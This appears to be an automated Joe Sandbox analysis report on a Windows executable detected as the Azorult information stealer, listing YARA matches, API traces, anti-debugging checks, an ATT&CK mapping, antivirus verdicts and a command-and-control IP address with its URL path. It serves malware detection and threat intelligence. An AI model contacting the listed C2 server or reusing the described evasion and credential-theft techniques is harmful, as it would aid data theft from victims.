Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_0040A4A4 CoCreateInstance,

0_2_0040A4A4

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7566F0FB-6CDB0B31-5F242D87

Source: 12E56QE1Fc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 12E56QE1Fc.exe	Virustotal: Detection: 73%
Source: 12E56QE1Fc.exe	ReversingLabs: Detection: 87%

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 12E56QE1Fc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\ralopim\sowofej.pdb source: 12E56QE1Fc.exe
Source:	Binary string: r\runtime\crypt\tmp_776930745\bin\fasofunox.pdb source: 12E56QE1Fc.exe
Source:	Binary string: <C:\ralopim\sowofej.pdbr\runtime\crypt\tmp_776930745\bin\fasofunox.pdbp source: 12E56QE1Fc.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Unpacked PE file: 0.2.12E56QE1Fc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,

0_2_00418124

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040D86E push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040D870 push 0040D89Ch; ret	0_2_0040D894
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004140C0 push 004140ECh; ret	0_2_004140E4
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004108C8 push 004108F4h; ret	0_2_004108EC
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040B0F7 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040B0F8 push 0040B124h; ret	0_2_0040B11C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00408080 push 004080B8h; ret	0_2_004080B0
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00408158 push 00408196h; ret	0_2_0040818E
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00408970 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00408994 push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004089AC push 004089E4h; ret	0_2_004089DC
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00415208 push 0041528Ch; ret	0_2_00415284
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040CA0C push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040CA10 push 0040CA3Ch; ret	0_2_0040CA34
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00417AEC push 00417B18h; ret	0_2_00417B10
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00404BC0 push 00404C11h; ret	0_2_00404C09
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040D3C0 push 0040D3ECh; ret	0_2_0040D3E4
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040A3E4 push 0040A410h; ret	0_2_0040A408
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040C390 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040C394 push 0040C3C0h; ret	0_2_0040C3B8
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040A3AC push 0040A3D8h; ret	0_2_0040A3D0
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040DC44 push 0040DCA3h; ret	0_2_0040DC9B
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040DC0C push 0040DC38h; ret	0_2_0040DC30
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040B41E push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040B420 push 0040B44Ch; ret	0_2_0040B444
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0040A438 push 0040A464h; ret	0_2_0040A45C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041A4F4 push 0041A51Ah; ret	0_2_0041A512
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00414C80 push 00414CACh; ret	0_2_00414CA4
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00409488 push 004094B8h; ret	0_2_004094B0
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041A4AC push 0041A4E8h; ret	0_2_0041A4E0
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00418CB8 push 00418CE8h; ret	0_2_00418CE0

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00417B1A

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

System information queried: CurrentTimeZoneInformation

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00416740 GetSystemInfo,

0_2_00416740

Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2059464987.000000000079C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00429D55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00429D55

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

0_2_00418124

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00407A34 mov eax, dword ptr fs:[00000030h]	0_2_00407A34
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0078537F mov eax, dword ptr fs:[00000030h]	0_2_0078537F
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00785374 mov eax, dword ptr fs:[00000030h]	0_2_00785374
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_007857E4 mov eax, dword ptr fs:[00000030h]	0_2_007857E4

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00427CA1 SetUnhandledExceptionFilter,	0_2_00427CA1
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00429D55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00429D55
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004275D1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004275D1

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: GetLocaleInfoA,	0_2_00404B4C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00430942
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004329EE
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0042F2C8
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00432AE3
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00432B8A
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,GetLocaleInfoW,	0_2_004294E6
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0042E4BB
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00432DB6
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: EnumSystemLocalesA,	0_2_00432E78
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00432EA2
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itow_s,	0_2_00432F45
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_0042FF54
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00432F09

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00428BFF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00428BFF

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_004065CC GetUserNameW,

0_2_004065CC

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

0_2_00404C15

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 12E56QE1Fc.exe PID: 6508, type: MEMORYSTR

Yara detected Azorult Info Stealer

Source: Yara match	File source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 12E56QE1Fc.exe PID: 6508, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	2 Obfuscated Files or Information	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
12E56QE1Fc.exe	73%	Virustotal		Browse
12E56QE1Fc.exe	88%	ReversingLabs	Win32.Trojan.Sodinokibi
12E56QE1Fc.exe	100%	Avira	TR/AD.MoksSteal.bwra
12E56QE1Fc.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/	0%	Avira URL Cloud	safe
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%	0%	Avira URL Cloud	safe
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA	0%	Avira URL Cloud	safe
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/	12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%	12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA	12E56QE1Fc.exe, 00000000.00000003.2057437868.0000000002330000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json	12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://dotbit.me/a/	12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.15.142.235	unknown	France		12876	OnlineSASFR	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589148
Start date and time:	2025-01-11 12:01:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
